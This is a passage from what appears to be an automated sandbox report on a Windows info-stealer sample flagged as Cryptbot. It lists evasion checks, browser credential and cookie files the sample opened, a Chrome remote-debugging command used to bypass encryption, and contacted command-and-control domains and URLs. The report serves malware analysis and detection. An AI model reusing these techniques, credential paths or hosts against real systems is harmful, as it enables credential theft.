Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Amcache.hve.17.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.17.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.17.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.17.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 12_2_00DA8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 12_2_00DA116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 12_2_00DA11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 12_2_00DA1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 12_2_00DA13C9
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.17.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.17.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.17.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.17.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.17.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 12.2.service123.exe.6c5b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.3543483372.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 504, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 2992, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2793251193.0000000001371000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2662069392.0000000001356000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 504, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 504, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2793251193.0000000001371000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2662069392.0000000001356000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 504, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1560842 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 8 other signatures 2->56 7 file.exe 5 2 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        16 service123.exe 2->16         started        process3 dnsIp4 40 fvtekk5pn.top 34.116.198.130, 49719, 49837, 49844 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->40 42 127.0.0.1 unknown unknown 7->42 44 home.fvtekk5pn.top 7->44 36 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->36 dropped 38 C:\Users\user\AppData\...\service123.exe, PE32 7->38 dropped 60 Detected unpacking (changes PE section rights) 7->60 62 Attempt to bypass Chrome Application-Bound Encryption 7->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->64 66 8 other signatures 7->66 18 service123.exe 7->18         started        21 WerFault.exe 22 16 7->21         started        24 chrome.exe 7->24         started        27 schtasks.exe 1 7->27         started        file5 signatures6 process7 dnsIp8 58 Multi AV Scanner detection for dropped file 18->58 34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->34 dropped 46 239.255.255.250 unknown Reserved 24->46 29 chrome.exe 24->29         started        32 conhost.exe 27->32         started        file9 signatures10 process11 dnsIp12 48 www.google.com 142.250.181.100, 443, 49859, 49862 GOOGLEUS United States 29->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.181.100 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
"home.fvtekk5pn.top true
    		unknown
    http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
      		high
      analforeverlovyu.top false
        		high
        QUERY|rd|AAAA|IN|home.fvtekk5pn.top false
          		high